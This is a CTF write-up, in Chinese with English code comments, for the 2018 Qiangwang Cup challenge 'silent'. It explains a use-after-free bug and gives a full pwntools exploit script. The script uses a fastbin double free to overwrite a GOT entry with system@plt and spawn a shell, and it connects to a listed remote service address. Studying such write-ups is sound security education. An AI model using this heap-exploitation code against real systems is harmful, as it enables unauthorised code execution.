silent
- 漏洞位置: del函數free掉堆塊后沒有清空指針造成了dangling_ptr。并且edit函數在使用時沒有檢查堆塊是否已經free。
- 利用思路:利用UAF構造fastbin attack。申請堆塊,釋放堆塊進入fastbin,edit釋放的堆塊,修改其中的fd到got表上去,再申請回來,修改got表。
Fastbin Attack 在malloc回來的時候會檢查size位,看這個堆塊是不是屬於該Fastbin,不過檢查時會忽略size的低4位(bit),所以如果size位為61,那麼61-6f都能通過檢查。
my-exp
from pwn import *
# Target selection. A nonzero `local` runs the binary in-process; otherwise
# the script connects to the remote service. Both branches load the same
# libc build (2.23); the heap behaviour the rest of the script relies on
# (see the fastbin notes above) is presumably tied to that version —
# TODO confirm against the actual target libc.
local = 1
if local:
    p = process('./silent')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
    p = remote('39.107.32.132' , 10000)#nc 39.107.32.132 10000
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
def add(length , text):
    """Drive menu option '1' (allocation, per the writeup above).

    Sends the option, then `length`, then `text`, each as its own line.
    No prompt is read back between sends; the fixed sleeps are the only
    pacing, so a slow target can desynchronise this helper.
    """
    p.sendline('1')
    sleep(0.3)
    p.sendline(str(length))
    sleep(0.3)
    p.sendline(text)
    sleep(0.3)
def dele(num):
    """Drive menu option '2' (free, per the writeup above) for chunk index `num`.

    The writeup notes this path frees the chunk without clearing the stored
    pointer, which is the root cause of the use-after-free / double free
    exercised in the main sequence below.
    """
    p.sendline('2')
    sleep(0.3)
    p.sendline(str(num))
    sleep(0.3)
def edit(num , text):
    """Drive menu option '3' (edit, per the writeup above) for chunk index `num`.

    Sends the option, the index, `text`, and finally an empty line; the
    reason for the trailing empty line is not shown here (presumably a
    second prompt — confirm against the binary). The writeup states this
    option does not check whether the chunk was already freed. Note that
    the main sequence below never calls this helper.
    """
    p.sendline('3')
    sleep(0.3)
    p.sendline(str(num))
    sleep(0.3)
    p.sendline(text)
    sleep(0.3)
    p.sendline('')
def debug():
    """Print the target's pid and block until Enter is pressed.

    Python 2 syntax (print statement, raw_input); intended as a manual
    breakpoint for attaching a debugger.
    """
    print pidof(p)[0]
    raw_input()
# Main sequence. Per the writeup: chunk 0 is freed twice (dele(0) ... dele(0))
# because the program's free path leaves the stored pointer dangling, which
# puts chunk 0 into the 0x60 fastbin twice. The first re-allocation then
# writes a forged fd (fake_chunk) into it, and three allocations later the
# allocator hands out a chunk overlapping that address. The defensive fix
# the writeup implies is to clear the pointer on free and have edit/free
# refuse chunks that are no longer allocated.
elf = ELF('./silent')
p.recvuntil('==+RWBXtIRRV+.+IiYRBYBRRYYIRI;VitI;=;..........:::.::;::::...;;;:.')
fake_chunk = 0x601ffa   # address used as the forged fd; a region near the GOT per the writeup
system_plt = 0x400730   # system@plt in the binary (presumably; confirm with the ELF)
success('fake_chunk => ' + hex(fake_chunk))
success('system_plt => ' + hex(system_plt))
add(0x50 , 'a' * 0x4f)#chunk 0, filler
add(0x50 , 'b' * 0x4f)#chunk 1, filler
add(0x50 , 'c' * 0x4f)
#debug()
dele(0)#fastbin->chunk0
dele(1)#fastbin->chunk1->chunk0
debug()   # NOTE: this call is active (unlike the two commented-out ones), so the script pauses here until Enter is pressed
dele(0)#fastbin->chunk0->chunk1->chunk0  (double free of chunk 0)
add(0x50 , p64(fake_chunk))#fastbin->chunk1->chunk0->0x601ffa ; writes the forged fd into chunk 0
add(0x50 , '/bin/sh\x00')#fastbin->chunk0->0x601ffa ; filler, also leaves the command string in this chunk
add(0x50 , 'c' * 0x4f)#fastbin->0x601ffa ; command chunk (chunk1)
add(0x50 , 'A' * 0xe + p64(system_plt))#overlapping chunk: per the writeup this overwrites the GOT entry used by free
dele(1)#free(chunk1) => system('/bin/sh\x00')
#debug()
p.interactive()
2018強網杯-Writeup